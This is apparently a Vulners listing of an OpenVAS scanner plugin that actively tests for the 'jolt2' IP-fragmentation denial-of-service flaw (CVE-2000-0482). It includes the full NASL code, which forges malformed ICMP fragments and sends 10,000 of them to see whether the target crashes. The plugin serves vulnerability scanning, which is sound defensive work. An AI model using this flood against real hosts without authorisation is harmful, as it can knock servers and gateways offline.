Lucene search
+L

'jolt2' DoS Vulnerability - Active Check

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Michel ArboiType 
openvas
 openvas
🔗 plugins.openvas.org👁 51 Views

Denial of Service attack 'jolt2' crashed machine or network gateway by flooding with incorrectly fragmented packet

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0482
13 Oct 200004:00
cve
Cvelist
CVE-2000-0482
13 Oct 200004:00
cvelist
EUVD
EUVD-2000-0481
7 Oct 202500:30
euvd
Tenable Nessus
TCP/IP IP Fragmentation Remote DoS (jolt2)
22 Oct 200300:00
nessus
NVD
CVE-2000-0482
6 Jun 200004:00
nvd
OpenVAS
jolt2
3 Nov 200500:00
openvas
CERT
IP Fragmentation Denial-of-Service Vulnerability in FireWall-1
26 Sep 200000:00
cert
# SPDX-FileCopyrightText: 2003 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

# Note: the original exploit looks buggy. I tried to reproduce it here.

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11902");
  script_version("2026-01-27T05:49:07+0000");
  script_tag(name:"last_modification", value:"2026-01-27 05:49:07 +0000 (Tue, 27 Jan 2026)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");
  script_cve_id("CVE-2000-0482");
  script_name("'jolt2' DoS Vulnerability - Active Check");
  script_category(ACT_FLOOD);
  script_copyright("Copyright (C) 2003 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("global_settings.nasl");
  script_exclude_keys("keys/TARGET_IS_IPV6");

  script_xref(name:"URL", value:"https://web.archive.org/web/20210208182550/http://www.securityfocus.com/bid/1312");

  script_tag(name:"summary", value:"The machine (or a gateway on the network path) crashed when
  flooded with incorrectly fragmented packets.

  This is known as the 'jolt2' denial of service (DoS) attack.");

  script_tag(name:"vuldetect", value:"Sends multiple crafted ICPM packets and checks if the remote
  host is still responding.");

  script_tag(name:"impact", value:"An attacker may use this flaw to shut down this server or router,
  thus preventing you from working properly.");

  script_tag(name:"solution", value:"Contact your operating system vendor for a patch.");

  script_tag(name:"qod_type", value:"remote_probe");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

if(TARGET_IS_IPV6())
  exit(0);

# nb: Ensure that the host is still up
start_denial();
sleep(2);
up = end_denial();
if(!up)
  exit(0);

src = this_host();
id = 0x455;
seq = rand() % 256;

ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_len:20 + 8 + 1,
                     ip_id:id, ip_p:IPPROTO_ICMP, ip_ttl:255,
                     ip_off:8190, ip_src:src);

icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0,
                         icmp_seq:seq, icmp_id:seq, data:"X");

start_denial();

send_packet(icmp, pcap_active:FALSE) x 10000;

alive = end_denial();
if(!alive) {
  security_message(port:0, proto:"icmp");
  set_kb_item(name:"Host/dead", value:TRUE);
  exit(0);
}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 25
EPSS0.06441
51